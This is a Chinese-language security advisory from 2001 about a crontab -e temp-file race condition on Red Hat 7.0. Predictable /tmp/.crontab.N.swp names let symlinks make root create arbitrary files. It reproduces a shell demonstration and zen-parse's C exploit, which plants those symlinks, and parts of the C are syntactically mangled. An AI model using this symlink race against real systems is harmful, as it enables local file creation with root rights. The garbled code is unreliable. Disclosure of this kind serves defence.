Redhat 7.0的Crontab -e 存在安全漏洞发布时间:2001-07-03 更新时间:2001-07-03 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 RedHat version 7.0详细描述 crontab允许本地攻击者以ROOT权利建立文件,crontab在装载vi editor时候使用 chdir,允许攻击者建立任意不存在的任意文件。 测试代码 Example: as User 1 bash$ cd /tmp;ln -s somefile .wahoo.swp as User 2 bash# cd /tmp;vi /tmp/wahoo :q bash# ls -al /tmp/somefile -rw------- 1 root root 4096 Apr 26 22:56 somefile Exploit: /******************************************************************* Crontab tmp file race condition http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771 Apparently this is fixed. Wonder why it still works. Local exploit Quick and dirty exploit for crontab insecure tmp files Redhat 7.0 - kept up2date with up2date Checked Tue Jun 26 00:15:32 NZST 2001 -rw------- 1 root root 4096 Jun 26 00:15 evil Requires root to execute crontab -e while the program is running. Not really likely to be too big of a problem, I hope. Could possibly be useful with the (still unpatched) makewhatis.cron bug. -- zen-parse *******************************************************************/ /*******************************************************************/ #define SAFER [1000] /*******************************************************************/ int shake(int script kiddy) { int f; char r SAFER; int w; f=fopen("/proc/loadavg","r"); fscanf(f,"%*s %*s %*s %*s %s",r); fclose(f); w=atoi(r); return w; } main(int argc,char *argv[]) { int p; char v SAFER; sprintf(v,"/tmp/.crontab.%d.swp",shake()); symlink("/evil",v); while(access("/evil",0)) { for(p=-30;p<0;p++) { sprintf(v,"/tmp/.crontab.%d.swp",shake()-p); symlink("/evil",v); } sprintf(v,"/tmp/.crontab.%d.swp",shake()-p); unlink(v); } for(p=-100;p<0;p++) { sprintf(v,"/tmp/.crontab.%d.swp",shake()-p); unlink(v); } } 解决方案 升级最新程序。 相关信息 zen-parse at gmx.net |
